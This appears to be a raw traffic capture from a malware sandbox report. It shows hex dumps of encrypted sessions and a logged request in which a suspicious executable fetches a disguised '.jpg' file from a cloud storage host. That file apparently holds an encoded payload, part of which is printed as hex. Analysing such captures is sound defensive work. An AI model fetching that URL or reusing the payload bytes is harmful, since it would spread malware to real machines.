                                              2025-01-05 09:12:35 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                              Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                              2025-01-05 09:12:35 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                              Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                              2025-01-05 09:12:35 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                              Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                              2025-01-05 09:12:36 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                              Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                              2025-01-05 09:12:36 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                              Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                              2025-01-05 09:12:36 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                              Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                              2025-01-05 09:12:36 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                              Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                              2025-01-05 09:12:36 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                              Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
                                              2025-01-05 09:12:36 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                              Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.662786118.178.60.94436032C:\Users\user\Documents\EMp3o1.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:12:46 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:46 UTC547INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:46 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 366410
                                              Connection: close
                                              x-oss-request-id: 677A4D0EA966993036C402AA
                                              Accept-Ranges: bytes
                                              ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                              Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 5641369857548672686
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                              x-oss-server-time: 61
                                              2025-01-05 09:12:46 UTC3549INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                              2025-01-05 09:12:46 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60
                                              Data Ascii: ```````````````````````````````````````````````````````````````
                                              2025-01-05 09:12:46 UTC4096INData Raw: 60 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9
                                              Data Ascii: ```%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                              2025-01-05 09:12:46 UTC4096INData Raw: 2c 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60
                                              Data Ascii: ,12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                              2025-01-05 09:12:47 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6
                                              Data Ascii: NNNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                              2025-01-05 09:12:47 UTC4096INData Raw: 75 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60
                                              Data Ascii: ubpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                              2025-01-05 09:12:47 UTC4096INData Raw: 61 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d
                                              Data Ascii: a``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                              2025-01-05 09:12:47 UTC4096INData Raw: 60 ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3
                                              Data Ascii: `5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                              2025-01-05 09:12:47 UTC4096INData Raw: 62 e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60
                                              Data Ascii: bjebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`
                                              2025-01-05 09:12:47 UTC4096INData Raw: eb 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 